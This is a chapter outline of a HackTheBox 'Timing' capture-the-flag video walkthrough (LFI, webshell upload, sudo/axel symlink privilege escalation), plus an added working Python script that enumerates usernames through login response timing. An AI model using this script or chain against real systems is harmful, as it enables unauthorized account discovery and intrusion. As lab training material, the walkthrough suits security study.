HackTheBox - Timing

00:00 - Intro
01:05 - Start of nmap
02:00 - Running feroxbuster and discovering image.php
05:05 - Fuzzing image.php for parameters and discovering an LFI
07:15 - Enumerating the WAF to find blacklisted strings and then using a php filter to extract source
10:00 - Examining the login.php source code and discovering a timing attack
12:00 - Demonstrating that login attempts with valid usernames take measurably longer, so we can brute-force usernames
14:10 - Creating a python script to enumerate users
21:00 - Logging in with aaron:arron (guessed the password)
22:30 - Extracting upload.php and admin_auth_check.php to see how we can upload files
23:30 - Attempting a mass assignment vulnerability on profile_update.php and discovering we can change our role
28:00 - Discovering that uploaded filenames depend on the upload time, so they can be predicted and chained with our LFI to execute code
31:50 - Using the CLI PHP Interpreter to generate potential filenames
34:00 - Uploading a webshell and then generating the filename based upon time
38:50 - Executing commands on the box and discovering we can't get a reverse shell
43:30 - Using my Forward Shell Python script to gain an interactive shell on the box
50:40 - Discovering a backup directory that has the web source but also the git repo
51:20 - SSH in as aaron and discovering he can run the netutils binary with sudo, which uses Axel to download files
54:00 - Tricking axel into writing to authorized_keys via a symlink
56:40 - Demonstrating that the sleep(1) wasn't needed for the initial timing attack (enumerating valid users) to work
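The user enumeration step (12:00 to 21:00) relies on one observation: a login attempt with a valid username takes longer than one with an invalid username. The script below is an added example written for this page, not IppSec's own enumeration script. It assumes (not stated on the page) that the form is POSTed to /login.php with fields named "username" and "password"; the target URL in the usage comment is a placeholder. The timing logic is separated from the HTTP probe so it can be run offline against a constructed, seeded simulation of a server that answers slowly for valid users.

```python
"""Timing-based username enumeration (added example, not from the video).

Assumed login form (not given on the page): POST /login.php with the
fields ``username`` and ``password``. The only signal used is wall-clock
response time, never the response body.
"""
import random
import statistics
import time
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Dict, Iterable, List, Set


def time_login(url: str, username: str, password: str = "invalid",
               timeout: float = 10.0) -> float:
    """Return how many seconds one login attempt took against a live target.

    An HTTP error status is still a timed answer: a 401/403 tells us how long
    the server spent processing the request, which is all we care about.
    """
    body = urllib.parse.urlencode(
        {"username": username, "password": password}).encode()
    req = urllib.request.Request(url, data=body, method="POST")
    start = time.perf_counter()
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            resp.read()
    except urllib.error.HTTPError:
        pass
    return time.perf_counter() - start


def enumerate_users(probe: Callable[[str], float], candidates: Iterable[str],
                    samples: int = 5, min_delta: float = 0.25,
                    ratio: float = 2.0) -> Dict[str, float]:
    """Report candidates whose login takes noticeably longer than the fastest.

    Each candidate is probed ``samples`` times and the median is kept, which
    suppresses single slow responses caused by network jitter. The fastest
    median is taken as the "invalid user" baseline (a wordlist is almost all
    invalid names). A candidate is reported as valid only if its median is
    both at least ``min_delta`` seconds slower than the baseline and at least
    ``ratio`` times the baseline, so ordinary jitter is not flagged.
    Returns {username: median_seconds} for the likely-valid names.
    """
    medians: Dict[str, float] = {}
    for user in candidates:
        medians[user] = statistics.median(probe(user) for _ in range(samples))
    if not medians:
        return {}
    baseline = min(medians.values())
    return {
        user: med for user, med in medians.items()
        if med - baseline >= min_delta and med >= ratio * baseline
    }


def simulated_probe(valid_users: Set[str], seed: int = 0,
                    extra_delay: float = 1.0) -> Callable[[str], float]:
    """Constructed stand-in for a server that is ``extra_delay`` seconds
    slower for valid usernames (the behaviour described on the page).
    Deterministic via ``seed`` so results are repeatable offline."""
    rng = random.Random(seed)

    def probe(username: str) -> float:
        base = 0.05 + rng.uniform(0.0, 0.02)          # normal response time
        return base + (extra_delay if username in valid_users else 0.0)

    return probe


def demo() -> List[str]:
    """Offline run against the constructed oracle; returns the names found."""
    wordlist = ["admin", "aaron", "bob", "test", "guest", "www-data"]
    found = enumerate_users(simulated_probe({"aaron"}), wordlist)
    return sorted(found)


if __name__ == "__main__":
    print("offline demo found:", demo())
    # Live usage (placeholder URL, adjust form fields to the real login.php):
    # probe = lambda u: time_login("http://target/login.php", u)
    # print(enumerate_users(probe, open("users.txt").read().split()))
```

Two practical caveats follow from the design. First, lower min_delta when the server-side difference is small; the 56:40 segment shows the enumeration still works without the sleep(1), and at that point the gap is whatever the remaining server-side work costs, so more samples per name and a smaller threshold are needed. Second, a slow baseline (a loaded or distant target) makes the ratio test harder to satisfy, which is why both an absolute and a relative threshold are checked.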
